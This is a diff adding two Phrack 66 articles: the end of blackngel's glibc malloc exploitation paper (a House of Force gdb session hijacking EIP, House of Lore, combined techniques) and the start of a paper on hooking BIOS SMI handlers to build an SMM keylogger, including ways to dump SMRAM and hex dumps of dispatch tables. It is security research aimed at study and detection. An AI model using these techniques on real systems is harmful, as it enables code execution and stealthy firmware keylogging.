+0x080481f0 <fvuln+0>:   push   %ebp
+0x080481f1 <fvuln+1>:   mov    %esp,%ebp
+0x080481f3 <fvuln+3>:   sub    $0x28,%esp
+0x080481f6 <fvuln+6>:   movl   $0x100,(%esp)
+0x080481fd <fvuln+13>:  call   0x804d3b0 <malloc>
+..........
+..........
+0x08048225 <fvuln+53>:  call   0x804e710 <strcpy>
+..........
+..........
+0x08048243 <fvuln+83>:  call   0x804d3b0 <malloc>
+0x08048248 <fvuln+88>:  mov    %eax,-0x8(%ebp)
+0x0804824b <fvuln+91>:  movl   $0x100,(%esp)
+0x08048252 <fvuln+98>:  call   0x804d3b0 <malloc>
+..........
+..........
+0x08048270 <fvuln+128>: call   0x804e7f0 <strncpy>
+0x08048275 <fvuln+133>: leave  
+0x08048276 <fvuln+134>: ret    
+End of assembler dump.
+
+(gdb) break *fvuln+83      /* Before malloc(len) */
+Breakpoint 1 at 0x8048243
+
+(gdb) break *fvuln+88      /* After malloc(len) */
+Breakpoint 2 at 0x8048248
+
+(gdb) run 3086207636 `perl -e 'print "\xff"x264'`
+.....
+PTR1 = [ 0x80c2688 ]
+
+Breakpoint 1, 0x08048243 in fvuln ()
+(gdb) x/16x &main_arena
+..........
+..........
+0x80bf550 <main_arena+48>:  0x080c2788  0x00000000  0x080bf550  0x080bf550
+                                 | 
+(gdb) c                       av->top
+Continuing.
+
+Breakpoint 2, 0x08048248 in fvuln ()
+(gdb) x/16x &main_arena
+..........
+..........
+0x80bf550 <main_arena+48>:  0xbffff220  0x00000000  0x080bf550  0x080bf550
+                                 |
+                          point to stack
+(gdb) x/4x $ebp-8
+0xbffff220:   0x00000000   0x480c3561   0xbffff258   0x080482cd
+                                | 
+(gdb) c                     important
+Continuing.
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()    /* Our application smash the stack itself */
+(gdb) 
+
+[-----]
+
+Yeah! So it was possible!!!
+
+I pointed out one value as "important" in the stack, and it is one of
+the last condition for a successful implementation of this technique.
+It requires that the "size" field of the new Wilderness chunk, been at
+least greater than the request made by the last call to "malloc()".
+
+NOTE: As you have seen in the introduction of this article, g463 wrote a
+      paper about how to take advantage of the set_head() macro in order
+      to overwrite an arbitrary memory address. This would be strongly
+      recommendable that you read this work. He also presented a briew
+      research about The House of Force...
+
+      Due to a serious error of mine, I did not read this article until
+      a Phrack member warned me of its existence after I had edited my
+      article. I can't avoid feeling amazed at the level of skills these
+      people are reaching. The work of g463 is really smart.
+
+In conclusion to this technique, I asked what would happen if, instead of
+what we have seen, the vulnerable code would looks like:
+
+   .....
+   char buffer[64];
+
+   ptr2 = malloc(len);
+   ptr3 = calloc(256);
+
+   strncpy(buffer, argv[1], 63);
+   .....
+
+At first, it is quite similar, only the last chunk of memory allocated is
+done through the function "calloc()" and in this case do not control their
+content, but we control a buffer declared at the beginning of the
+vulnerable function.
+
+Faced with this obstacle, I had an idea in mind. If it remains possible
+return an arbitrary piece of memory and since calloc() will fill it with
+"0's", perhaps it could be placed so that the last NULL byte "0" may
+overwrite the last byte of a saved EBP, so this is passed finally to ESP,
+and may control the return address from within our buffer[].
+
+But soon I warned that the alignment of malloc() algorithm when this is
+called, thwarts this possibility. We could overwrite EBP completely with
+"0's", which is useless for our purposes. And besides, always there to
+take care not to crush our buffer[] with zeros if the reserve of memory
+occurs after the content has been established by the user.
+
+And it is all... As always, this technique also remains being applicable
+with the latest versions of glibc (2.8.90).
+
+We have arrived, pushed by the power of force, to The House of Force.
+
+
+
+                          << La gente comienza a plantearse
+                             si todo lo que se puede hacer
+                             se debe hacer. >>
+
+                                          [ D. Ruiz Larrea ]
+
+
+
+               ---------------
+---[ 4.4.1 ---[   MISTAKES    ]---
+               ---------------
+
+In fact, what we have done in the previous section, the fact of using the
+stack was the only viable solution that I found, after realize some errors
+that Phantasmal had not expected.
+
+The point is that the description of his technique, he raised the
+possibility of overwrite targets as .dtors or Global Offset Table.
+But I soon realized that this did not seem possible.
+
+Given that "av->top" was: [0x080c2788]. In a short analysis like this...
+
+     blackngel@linux:~$ objdump -s -j .dtors ./hof
+     .....
+     Contents of section .dtors:
+     80be47c ffffffff 20480908 00000000
+     .....
+     Contents of section .got:
+     80be4b8 00000000 00000000 
+
+... we can see that both addresses are behind the address of "av->top",
+and an amount not lead us to these addresses. Function pointers, the BSS
+region, and also other things are behind...
+
+If you want to play with negative numbers or integer overflows, I allow
+that you to make all neccesary tests.
+
+It is by this that the Malloc Maleficarum did not mention that the
+designer controlled value to allocate memory, should be an "unsigned" or,
+otherwise, any value greater than 2147483647 will change its sign directly
+to become a negative value, which ends at most cases with a segmentation
+fault.
+
+He doesn't think this because he think that he could overwrite memory
+positions that were at highest addresses that the Wilderness chunk, bu
+not as far as "0xbffffxxx".
+
+Imposible is nothing in this world, and I know that you can feel The House
+of Force.
+
+
+
+               << La utopia esta en el horizonte. Me
+                  acerco dos pasos, ella se aleja dos
+                  pasos. Camino diez pasos y el horizonte
+                  se corre diez pasos mas alla. Por
+                  mucho que yo camine, nunca la alcanzare.
+                  Para que sirve la utopia? Para eso
+                  sirve, para caminar. >>
+
+                                            [ E. Galeano ]
+
+
+
+             -----------------------
+---[ 4.5 ---[   THE HOUSE OF LORE   ]---
+             -----------------------
+	
+This technique will be detailed here in a theoretical way to express what
+Phantasmal supposedly wanted to say in his Malloc Maleficarum paper.
+
+The House of Lore requires triggering numerous calls to "malloc()" what
+seems not to be a designer controlled value and turns into something
+unreal.
+
+But I again repeat the same thing I said at the end of the technique The
+House of Mind (CVS vulnerability). And the same showed case is perfect for
+the conditions that should meet in The House of Lore. We need multiple
+calls to malloc( ) controlling their sizes.
+
+To give a simple explanation, we will approach to the topic through
+schemes.
+
+When a chunk is stored in your appropriated "bin", it is inserted as the
+first:
+
+       1) Calculating the index for the chunk's size:
+
+             victim_index = smallbin_index(size);
+
+       2) Get the proper bin:
+
+             bck = bin_at(av, victim_index);
+
+       3) Get the first chunk:
+
+             fwd = bck->fd;
+
+       4) Pointer "bk" of chunk points to the bin:
+
+             victim->bk = bck;
+
+       5) Pointer "fd" of chunk points to the previous
+          first chunk at bin:
+
+             victim->fd = fwd;
+
+       6) Pointer "bk" of the next chunk points to our
+          inserted chunk:
+
+             fwd->bk = victim;
+
+       7) Pointer "fd" of the "bin" points to our chunk:
+
+             bck->fd = victim;
+
+
+                   bin->bk  ___  bin->fwd
+                  o--------[bin]----------o
+                  !         ^ ^           !
+               [last]-------| |-------[victim]
+                 ^|   l->fwd    v->bk    ^|
+                 |!                      |!
+               [....]                  [....]
+                   \\                  //
+                    [....]        [....]
+                     ^ |____________^ |
+                     |________________|    
+
+
+	
+Into "unlink code", if "victim" is taken from "bin->bk, it may be
+necessary to repeat numerous calls to malloc() until the "victim" reach
+the "last" position.
+
+Let's see the code to discover a few things:
+
+
+      .....
+      if ( (victim = last(bin)) != bin) {
+        if (victim == 0) /* initialization check */
+          malloc_consolidate(av);
+        else {
+          bck = victim->bk;
+          set_inuse_bit_at_offset(victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+          ...
+          return chunk2mem(victim);
+      .....
+
+
+In this technique, Phantasmal said that the ultimate goal was to overwrite
+"bin->bk," but the first element that we can control is "victim->bk".  As
+far as I can understand, we must ensure that the overflowed chunk passed
+to "free ()" is in the previous position to "last", so that "victim->bk"
+point to its address, that we must control and should point to the stack.
+
+This address is passed to "bck" and then will change "bin->bk". Due to
+this, we now control the "last" chunk with a designer controlled address.
+
+That is why we need a new call to "malloc()" with same size as the
+previous call, so that this value is the new "victim" and is returned in:
+
+     return chunk2mem (victim);
+
+[-----]
+
+
+     *ptr1 -> modified;
+
+     First call to "malloc()":
+     -------------------------
+
+         ___[chunk]_____[chunk]_____[chunk]____ 
+        |                                      |
+        !    bk                 bk             |
+      [bin]----->[last=victim]----->[ ptr1 ]---/
+        ^____________| ^_______________|
+             fwd      ^       fwd
+                      |
+        return chunk2men(victim);
+
+
+
+     Second call to "malloc()":
+     --------------------------
+
+         ___[chunk]_____[chunk]_____[chunk]____ 
+        |                                      |
+        !    bk              bk                |
+      [bin]----->[ ptr1 ]--------->[ chunk ]---/
+        ^___________| ^________________|
+             fwd     ^       fwd
+                     |
+        return chunk2men(ptr1);
+
+
+[-----]
+
+One must be careful with that also overwrites "bck->fd" in turn, in the
+stack it is not a big problem.
+
+It is for this reason that if your interest is really enough, my tip is
+that you don't pay much attention to The House of Prime, as indicated
+Phantasmal in his paper, instead, consider again the House of Spirit.
+
+In theory, using a similar technique, a false chunk should can been sited
+in its corresponding "bin" and trigger a further call to "malloc()" that
+could returns the same memory space.
+
+Remember that the size of allocated chunk must be greater than
+"av->max_fast" (72), and less than 512 to execute "small bin" code instead
+of fastbin code:
+
+   #define NSMALLBINS        64
+   #define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+   #define MIN_LARGE_SIZE    (NSMALLBINS * SMALLBIN_WIDTH)
+
+   [64] * [8] = [512]
+
+For "largebin" method will have to use larger chunks than this estimated
+size.
+
+Like all houses, it's only a way of playing, and The House of Lore,
+although not very suitable for a credible case, no one can say that
+is a complete exception...
+
+
+
+                   << La humanidad necesita con urgencia
+                      una nueva sabiduria que proporcione
+                      el conocimiento de como usar el
+                      conocimiento para la supervivencia
+                      del hombre y para la mejora de la
+                      calidad de vida. >>
+
+                                         [ V. R. Potter ]
+
+
+
+             ------------------------------
+---[ 4.6 ---[   THE HOUSE OF UNDERGROUND   ]---
+             ------------------------------
+
+Well, this house really was not described in Phantasmal Phantasmagoria's
+paper, but it is quite useful to describe a concept that I have in mind.
+
+In this world are all possibilities. Chances that something goes well, or
+chances of something going wrong. In the world of the vulnerabilities
+exploitation, this remains true. The problem is to get the neccesary
+skills to find these possibilities, usually the possibility of that
+something goes well.
+
+Speaking at this time to unite several of the prior techniques in a same
+attack should not be so strange, and sometimes could be the most
+appropriate solution. Recall that g463 is not satisfied with the technique
+The House of Force to work on the vulnerability of the file (1) utility,
+but he was looking for new possibilities so that things come out well.
+
+For example ... what about using in a same instant the The House of Mind
+and The House of Spirit methods?
+
+Consider that both have their own limitations. On the one hand, The House
+Mind need as has been said a piece of memory in an above address that
+"0x08100000", while The House of Spirit, states that once the pointer to
+be free()ed has been overwritten, a new call to malloc() will be done.
+
+In The House of Mind, the main goal is to control the "arena" structure
+and this change starts with the modification of the third bit less
+significant of the size field of the overwritten chunk (P). But the fact
+we can modify this metadata, does not mean that we have control of the
+address of this chunk.
+
+In contrast, in The House of Spirit, we alter the address of P, through
+the manipulation of the pointer to the data area (*mem). But what happens
+if in your vulnerable application does not exist a new call to malloc()
+that will return an arbitrary piece of memory on the stack?
+
+You may still investigate new avenues, but I would not be assured that
+running.
+
+If we can change the pointer to be freed, like in The House of Spirit,
+this will be passed to free() in:
+
+   public_fREe(Void_t* mem)
+
+We can make it point to some place like the stack or the environment. It
+should always be a memory location with data controlled by the user. Then
+the effective address of the chunk would taken at:
+
+   p = mem2chunk(mem);
+	
+At this point we leave The House of The Spirit to focus on The House of
+Mind. Then again we must control the arena "ar_ptr" and, to achieve this,
+(&p + 4) should contain a size with the NON_MAIN_ARENA bit enabled.
+
+But that is not the most important thing here, the final question is:
+could you put the chunk in a place so that you can then control the area
+returned by "heap_for_ptr(ptr)->ar_ptr"?
+
+Remember that in the stack that would be something like "0xbff00000". It
+seems quite difficult reach an address like this even introducing a
+padding into environment.
+
+But again, all ways should be studied, you could find a new method, and
+perhaps you call it The House of Underground...
+
+
+
+                 << Los apasionados de Internet han encontrado
+                    en esta opcion una impensada oportunidad
+                    de volver a ilusionarse con el futuro. No
+                    solo algunos disfrutan como enanos; creen
+                    que este instrumento agiganta y que, acabada
+                    la fragmentacion entre unos y otros, se ha
+                    ingresado en la era de la conexion global.
+                    Internet no tiene centro, es una red de
+                    dibujo democratico y popular. >>
+
+                               [ V. Verdu: El enredo de la red ]
+
+
+
+
+           ----------------------------------------
+---[ 5 ---[   ASLR and Nonexec Heap (The Future)   ]---
+           ----------------------------------------
+
+We have not discussed in this article about how to circumvent protections
+like memory address randomization (ASLR) and a non executable Heap . And
+we will not do, but something we can say about it. You should be aware
+that in all my basic exploits, I have hardcoded the majority of the
+addresses.
+
+This way of working is not very reliable in the days we live in...
+
+In all techniques presented in this paper, especially int The House of
+Spirit or The House of Force, where all comes down to a stack overflow, we
+guess that it would be applicable the methods described in other papers
+released in Phrack magazine or extern publications that explained how to
+bypass ASLR protection and others about how to return into mprotect ( ) to
+bypass a non exectuable heap and things like that.
+
+Regarding to the first topic, we have a magic work, "Bypassing PaX ASLR
+protection" [11] by Tyler Durden in Phrack 59.
+
+On the other hand, circumvent a non executable heap whether if ASLR is
+present and our skills to find the real address of a function like
+mprotect( ) to allow us to change the permissions of the pages of memory.
+
+Since I started my little research and work to write this article, my goal
+has always been to leave this task as the homework for new hackers who
+have the strength to continue in this way.
+
+Finally, this is a new area for further research.
+
+
+
+                 << Todo tiene algo de belleza pero
+                    no todos son capaces de verlo. >>
+
+                                         [ Confucio ]
+
+
+
+           -------------------------
+---[ 6 ---[   THE HOUSE OF PHRACK   ]---
+           -------------------------
+	
+This is just a way so you can continue researching. There is a world full
+of possibilities, and most of them still aren't discovered. Do you want
+be the next?
+
+This is your house!
+
+
+To finish, because Phrack admits "spirit oriented" articles, I will
+venture to drop a simple comment.
+
+Anyone interested in Linux development had read ever interesting articles
+as "The Cathedral and the Bazar" and "Homesteading the Noosphere" of the
+arch-known founder of the Open Source movement, Eric S. Raymond. For this
+is not so, maybe they had read "Jargon File" or perhaps for others, the
+"Hacker How-To". It is the latter that we are interested, especially when
+Raymond mentions the following:
+
+   * Don't use a silly, grandiose user ID or screen name.
+
+   << The problem with screen names or handles deserves some
+      amplification. Concealing your identity behind a handle
+      is a juvenile and silly behavior characteristic of crackers,
+      warez d00dz, and other lower life forms. Hackers don't do
+      this; they're proud of what they do and want it associated
+      with their real names. So if you have a handle, drop it.
+      In the hacker culture it will only mark you as a loser. >>
+	
+
+As far as I understand, this means that all those who had written in
+Phrack are childhood, crackers, lower life forms and are marked in the
+hacker culture as losers.
+
+Is there some connection between our name and our skills, philosophy
+of life or our ethics in hacking? 
+
+Me, in my sole opinion, if this is true, I am proud that Phrack admit into
+their lines to lower life forms. Lower life forms that have helped to
+raise the security level of the network of networks in ways unimaginable.
+
+To all of them, thanks!!!
+
+
+blackngel
+
+
+
+                         "Adormecida, ella yace
+                          con los ojos abiertos
+                como la ascensin del Angel hacia arriba
+                    Sus bellos ojos de disuelto azul
+                que responden ahora: "lo hare, lo hago!
+                la pregunta realizada hace tanto tiempo.
+
+                         Aunque ella debe gritar
+                              no lo parece
+                  lo que pronuncia es mas que un grito
+                     Yo se que el Angel debe llegar
+               para besarme suavemente, como mi estimulo
+                la aguja profunda penetra en sus ojos."
+
+              * Versos 4 y 5 de "El beso del Angel Negro"
+
+
+
+           ----------------
+---[ 7 ---[   REFERENCES   ]---
+           ----------------
+
+[1] Vudo - An object superstitiously believed to embody magical powers
+    http://www.phrack.org/issues.html?issue=57&id=8#article
+
+[2] Once upon a free()
+    http://www.phrack.org/issues.html?issue=57&id=9#article
+
+[3] Advanced Doug Lea's malloc exploits
+    http://www.phrack.org/issues.html?issue=61&id=6#article
+
+[4] Malloc Maleficarum
+    http://seclists.org/bugtraq/2005/Oct/0118.html    
+
+[5] Exploiting the Wilderness
+    http://seclists.org/vuln-dev/2004/Feb/0025.html
+
+[6] The House of Mind
+    http://www.awarenetwork.org/etc/alpha/?x=4
+
+[7] The use of set_head to defeat the wilderness
+    http://www.phrack.org/issues.html?issue=64&id=9#article
+
+[8] GLIBC 2.3.6
+    http://ftp.gnu.org/gnu/glibc/glibc-2.3.6.tar.bz2
+
+[9] PTMALLOC of Wolfram Gloger
+    http://www.malloc.de/en/
+
+[10] The art of Exploitation: Come back on an exploit
+     http://www.phrack.org/issues.html?issue=64&id=15#article
+
+[11] Bypassing PaX ASLR protection
+     http://www.phrack.org/issues.html?issue=59&id=9#article
+
+
+--------[ EOF
diff --git a/phrack66/11.txt b/phrack66/11.txt
new file mode 100644
index 0000000..ff7a19b
--- /dev/null
+++ b/phrack66/11.txt
@@ -0,0 +1,1694 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x0B of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=---=[ A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers ]=---=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Filip Wecherowski ]=------------------------=|
+|=--------------=[ core collapse <core_collapse@hush.com> ]=-------------=|
+|=-----------------------------------------------------------------------=|
+                    
+
+          
+--[ ABSTRACT
+
+
+The research provided in this paper describes in details how to reverse
+engineer and modify System Management Interrupt (SMI) handlers in the BIOS
+system firmware and how to implement and detect SMM keystroke logger. This
+work also presents proof of concept code of SMM keystroke logger that uses
+I/O Trap based keystroke interception and a code for detection of such
+keystroke logger.
+
+
+
+--[ INDEX
+
+  1 - INTRODUCTION
+
+  2 - REVERSE ENGINEERING SYSTEM MANAGEMENT INTERRUPT (SMI) HANDLERS
+
+    2.1 - Brief Overview of BIOS Firmware
+    2.2 - Overview of System Management Mode (SMM)
+    2.3 - Extracting binary of BIOS SMI Handlers
+    2.4 - Disassembling SMI Handlers
+    2.5 - Disassembling "main" SMI dispatching function
+    2.6 - Hooking SMI handlers
+
+  3 - SMM KEYLOGGER
+
+    3.1 - Hardware I/O Trap mechanism
+    3.2 - Programming I/O Trap to capture keystrokes
+    3.3 - System Management Mode keylogger payload
+    3.4 - I/O Trap based keystroke logger SMI handler
+    3.5 - Multi-processor keylogger specifics
+
+  4 - SUGGESTED DETECTION METHODS
+
+    4.1 - Detecting I/O Trap based SMM keylogger
+    4.2 - General timing based detection
+
+  5 - CONCLUSION
+
+  6 - SOURCE CODE
+
+    6.1 - I/O Trap based System Management Mode keystroke logger
+    6.2 - Programming I/O Trap
+    6.3 - Detecting I/O Trap SMI keystroke logger
+
+  7 - REFERENCES
+
+             
+
+--[ 1 - INTRODUCTION
+
+
+This work gives an overview of how code works in Systems Management Mode
+and how it can be Hi Jack!ed to inject malicious SMI code. As an example,
+we show how to hijack SMI code and inject SMM keystroke logger payload.
+
+SMM malware as well as security of SMI code in (U)EFI firmware was
+discussed in [efi_hack]. SMM keylogger was first introduced by Sherri
+Sparks and Shawn Embleton at Black Hat USA 2008 [smm_rkt] but very little
+details were provided by the authors regarding how SMI code works, how one
+could hook it and more importantly how would anyone detect such malware.
+
+We use a different technique to enable keystroke logging in SMM than was
+used by [smm_rkt]. We utilize I/O Trap mechanism provided by modern
+chipsets instead of I/O APIC.
+
+We strongly believe that to effectively combat SMM malware in the future
+we need to learn internals of SMM firmware which is a primary motivation
+for writing this article. Until then SMM security will be in a state of
+hysteria. In the paper we also describe some methods to detect the
+presence of SMI keystroke logger.
+
+We do not disclose any vulnerability that would allow injecting malicious
+payload into SMM. The first known SMM exploit was disclosed in [smm],
+another exploit was disclosed in [xen_0wn] (*). Both of them exploited
+insecure hardware configuration programmed by the BIOS system firmware
+that also contains SMI handlers. Thus far, very little research is
+available in the internals of SMI handlers. We believe this is due to
+complexity of their debugging and reverse engineering. This work is
+designed to close this gap regardless of specific vulnerabilities that may
+be used to inject malicious code into SMM.
+
+It should be noted that this work only explores SMI code in the BIOS of
+ASUS motherboards, specifically in ASUS P5Q based on Intel P45 hardware.
+ASUS implements BIOS based on AMIBIOS 8 therefore most of the results of
+this work apply to other motherboard manufacturers that use BIOS firmware
+based on AMI BIOS. Many results are also applicable to motherboards that
+use other BIOS cores because of similarities in implementation of SMI
+handlers in different BIOS firmware. SMM is a x86 feature common for all
+motherboards which also leads to a similar SMI firmware design across
+different BIOS firmware implementations.
+
+(*) While writing this article authors learned about another vulnerability
+discovered in CPU SMRAM caching design [smm_cache].
+
+
+
+--[ 2 - REVERSE ENGINEERING SYSTEM MANAGEMENT INTERRUPT (SMI) HANDLERS
+
+
+
+--[ 2.1 - Brief Overview of BIOS Firmware
+
+
+The first instruction fetched by CPU after reset is located at 0xFFFFFFF0
+address and is mapped to BIOS firmware ROM. This instruction is referred to
+as "reset vector". Reset vector is typically a jump to the first bootstrap
+code, BIOS boot block. Boot block code and reset vector are physically
+residing in BIOS ROM. Access to BIOS ROM is slow compared to DRAM and BIOS
+firmware cannot use writable memory such as stack when executing from ROM
+or flash.
+
+For these reasons BIOS boot block code copies the rest of system BIOS code
+from ROM into DRAM. This process is known as "BIOS shadowing". Shadowed
+system BIOS code and data segments reside in lower DRAM regions below 1MB.
+Main system BIOS code is located in memory ranges 0xE0000 - 0xEFFFF or
+0xF0000 - 0xFFFFF.
+
+BIOS firmware includes not only boot-time code but also firmware that will
+be executing at run-time "in parallel" to the Operating System but in it's
+own "orthogonal" SMRAM memory reserved from the OS. This run-time firmware
+consists of System Management Interrupt (SMI) handlers that execute in
+System Management Mode (SMM) of a CPU.
+
+
+
+--[ 2.2 - Overview of System Management Mode (SMM)
+
+
+Processor switches to System Management Mode (SMM) from protected or
+real-address mode upon receiving System Management Interrupt (SMI) from
+various internal or external devices or generated by software. In response
+to SMI it executes special SMI handler located in System Management RAM
+(SMRAM) region reserved by the BIOS from Operating System for various SMI
+handlers. SMRAM is consisting of several regions contiguous in physical
+memory: compatibility segment (CSEG) fixed to addresses 0xA0000 - 0xBFFFF
+below 1MB or top segment (TSEG) that can reside anywhere in the physical
+memory.
+
+If CPU accesses CSEG while not in SMM mode (regular protected mode code),
+memory controller forwards the access to video memory instead of DRAM.
+Similarly, non-SMM access to TSEG memory is not allowed by the hardware.
+Consequently, access to SMRAM regions is allowed only while processor is
+executing code in SMM mode. At boot time, system BIOS firmware initializes
+SMRAM, decompresses SMI handlers stored in BIOS ROM and copies them to
+SMRAM. BIOS firmware then should "lock" SMRAM to enable its protection
+guaranteed by chipset so that SMI handlers cannot be modified by the OS or
+any other code from this point on.
+
+Upon receiving SMI CPU starts fetching SMI handler instructions from SMRAM
+in big real mode with predefined CPU state. Shortly after that, SMI code
+in modern systems initializes and loads Global Descriptor Table (GDT) and
+transitions CPU to protected mode without paging. SMI handlers can access
+4GB of physical memory. Operating System execution is suspended for the
+entire time SMI handler is executing till it resumes to protected mode and
+restarts OS execution from the point it was interrupted by SMI.
+
+Default treatment of SMI and SMM code by the processor that supports
+virtual machine extensions (for example, Intel VMX) is to leave virtual
+machine mode upon receiving SMI for the entire time SMI handler is
+executing [intel_man]. Nothing can cause CPU to exit to virtual machine
+root (host) mode when in SMM, meaning that Virtual Machine Monitor (VMM)
+does not control/virtualize SMI handlers.
+
+Quite obviously that SMM represents an isolated and "privileged"
+environment and is a target for malware/rootkits. Once malicious code is
+injected into SMRAM, no OS kernel or VMM based anti-virus software can
+protect the system nor can they remove it from SMRAM.
+
+It should be noted that the first study of SMM based rootkits was provided
+in the paper [smm] followed by [phrack_smm] and a proof of concept
+implementation of SMM based keylogger and network backdoor in [smm_rkt].
+
+
+
+--[ 2.3 - Extracting binary of BIOS SMI Handlers
+
+
+There seems to be a common misunderstanding that some "hardware analyzer"
+is required to disassemble SMI handlers. No, it is not. SMI handlers is a
+part of BIOS system firmware and can be disassembled similarly to any BIOS
+code. For detailed information on reversing Award and AMI BIOS, interested
+reader should read this excellent book and series of articles by Pinczakko
+[bios_disasm].
+
+There are two easy ways to dump SMI handlers on a system:
+
+1. Use any vulnerability to directly access SMRAM from protected mode and
+   dump all contents of SMRAM region used by the BIOS (TSEG, High SMRAM or
+   legacy SMRAM region at 0xA0000-0xBFFFF). For instance, if BIOS doesn't
+   lock SMRAM by setting D_LCK bit then SMRAM can be dumped after
+   modifying SMRAMC PCI configuration register as explained in [smm] and
+   [phrack_smm].
+
+   If you are unfortunate and BIOS locks SMRAM and there are no other flaw
+   to use then BIOS firmware can be modified such that it doesn't set D_LCK
+   any more. After re-flashing modified BIOS ROM binary back and booting the
+   system from this BIOS, SMRAM will not be locked and can be dumped from
+   the OS. This, surely, works only if BIOS firmware isn't digitally signed.
+   Oh, we forgot that almost no motherboards use digitally signed non-EFI
+   BIOS firmware.
+   
+   Here's a hint how to find where BIOS firmware sets D_LCK bit. BIOS
+   firmware is most likely using legacy I/O access to PCI configuration
+   registers using 0xCF8/0xCFC ports. To access SMRAMC register BIOS
+   should first write value 0x8000009C to 0xCF8 address port and then a
+   needed value (typically, 0x1A to lock SMRAM) to 0xCFC data port.
+
+2. There's another, probably simpler, way to disassemble SMI handlers, that
+   doesn't require access to SMRAM at run-time. 
+
+   2.1. Dump BIOS firmware binary from BIOS ROM using Flash programmer or
+   simply download the latest BIOS binary from vendor's web site ;). For
+   ASUS P5Q motherboard download P5Q-ASUS-PRO-1613.ROM file.
+
+   2.2. Most of the BIOS firmware including Main BIOS module which
+   contains SMI handlers is compressed. Use tools provided by vendor to
+   extract/decompress the Main BIOS module. ASUS BIOS is based on AMI BIOS
+   so we used AMIBIOS BIOS Module Manipulation Utility, MMTool.exe, to
+   extract the Main BIOS module. Open downloaded .ROM file in MMTool,
+   choose to extract "Single Link Arch BIOS" module (ID=1Bh), check "In
+   uncompressed form" option and save it. This is uncompressed Main BIOS
+   module containing SMI handlers.
+   
+   Check out a resource on modifying AMI BIOS on The Rebels Heaven forum
+   [ami_mod].
+
+   2.3. Once the Main BIOS module is extracted you can start disassembling
+   it to find SMI handlers (for example, using HIEW or IDA Pro). In this
+   paper we hope to provide a starting point for analyzing SMI handlers.
+
+
+So let's jump to disassembling SMI handlers firmware.
+
+
+
+--[ 2.4 - Disassembling SMI Handlers
+
+
+We noticed that ASUS/AMI BIOS uses an array of structures describing
+supported SMI handlers. Each entry in the array starts with signature
+"$SMIxx" where last two characters 'xx' identify specific SMI handler.
+
+Here is SMI dispatch table used by AMIBIOS 8 in ASUS P5Q SE motherboard
+based on Intel's P45 desktop chipset:
+
+ 00065CB0:  00 24 53 4D-49 43 41 00-00 70 B4 00-40 BF 07 00   $SMICA  p_ @.  
+ 00065CC0:  40 20 6E C8-A8 4B 6E C8-A8 24 53 4D-49 53 53 00  @ n..Kn..$SMISS 
+ 00065CD0:  00 B1 B4 00-40 B4 B4 00-40 91 85 C8-A8 B5 85 C8   +_ @__ @':...:.
+ 00065CE0:  A8 24 53 4D-49 50 41 00-00 A8 87 C8-A8 B9 87 C8  .$SMIPA  .+...+.
+ 00065CF0:  A8 B4 88 C8-A8 1C 89 C8-A8 24 53 4D-49 53 49 00  .__.. %..$SMISI 
+ 00065D00:  00 B5 B4 00-40 C7 B4 00-40 63 9F C8-A8 7B 9F C8   ._ @._ @c_..{_.
+ 00065D10:  A8 24 53 4D-49 58 35 00-00 35 DE 00-40 38 DE 00  .$SMIX5  5. @8. 
+ 00065D20:  40 BE 9F C8-A8 D2 9F C8-A8 24 53 4D-49 42 50 00  @__..._..$SMIBP 
+ 00065D30:  00 E4 E0 00-40 F6 E0 00-40 5A A6 C8-A8 80 A6 C8   .. @.. @Z..._..
+ 00065D40:  A8 24 53 4D-49 53 53 00-00 01 E1 00-40 14 E1 00  .$SMISS   . @ . 
+ 00065D50:  40 A0 A6 C8-A8 C6 A6 C8-A8 24 53 4D-49 45 44 00  @........$SMIED 
+ 00065D60:  00 8D E3 00-40 90 E3 00-40 DF A7 C8-A8 F2 A7 C8   _. @_. @.......
+ 00065D70:  A8 24 53 4D-49 46 53 00-00 91 E3 00-40 94 E3 00  .$SMIFS  '. @". 
+ 00065D80:  40 41 A8 C8-A8 53 A8 C8-A8 24 53 4D-49 50 54 00  @A...S...$SMIPT 
+ 00065D90:  00 29 E8 00-40 39 E8 00-40 21 AA C8-A8 33 AA C8   ). @9. @!...3..
+ 00065DA0:  A8 24 53 4D-49 42 53 00-00 55 E8 00-40 58 E8 00  .$SMIBS  U. @X. 
+ 00065DB0:  40 D0 AA C8-A8 12 AB C8-A8 24 53 4D-49 56 44 00  @.... <..$SMIVD 
+ 00065DC0:  00 A3 E8 00-40 A6 E8 00-40 CD AB C8-A8 DD AB C8   _. @.. @.<...<.
+ 00065DD0:  A8 24 53 4D-49 4F 53 00-00 A7 E8 00-40 AA E8 00  .$SMIOS  .. @.. 
+ 00065DE0:  40 CC AC C8-A8 E7 AC C8-A8 24 53 4D-49 42 4F 00  @........$SMIBO 
+ 00065DF0:  00 AB E8 00-40 AE E8 00-40 F7 AC C8-A8 FB AC C8   <. @R. @.......
+ 00065E00:  A8 24 44 45-46 FF 00 01-00 AF E8 00-40 B2 E8 00  .$DEF.   .. @_. 
+ 00065E10:  40 9C B3 C8-A8 A7 B3 C8-A8 53 53 44-54 13 06 00  @__..._..SSDT   
+
+
+Another example, SMI dispatch table on ASUS B50A laptop with Intel mobile
+GM45 express and ICH9M chipset looks similar but has more SMI handlers:
+
+ 0007BE90:  24 53 4D 49-54 44 00 00-92 6D EA 47-9B 6D EA 47  $SMITD  'm.G>m.G
+ 0007BEA0:  10 6B 66 A8-11 6B 66 A8-24 53 4D 49-54 43 00 00   kf. kf.$SMITC  
+ 0007BEB0:  30 7E 66 A8-39 7E 66 A8-3A 7E 66 A8-5F 7E 66 A8  0~f.9~f.:~f._~f.
+ 0007BEC0:  24 53 4D 49-43 41 00 00-B0 89 EA 47-E9 08 EA 47  $SMICA  .%.G. .G
+ 0007BED0:  70 81 66 A8-9B 81 66 A8-24 53 4D 49-53 53 00 00  p_f.>_f.$SMISS  
+ 0007BEE0:  F1 89 EA 47-F4 89 EA 47-B8 95 66 A8-D1 95 66 A8  .%.G.%.G..f...f.
+ 0007BEF0:  24 53 4D 49-53 49 00 00-E4 18 32 5E-F6 18 32 5E  $SMISI  . 2^. 2^
+ 0007BF00:  96 97 66 A8-B4 97 66 A8-24 53 4D 49-58 35 00 00  --f._-f.$SMIX5  
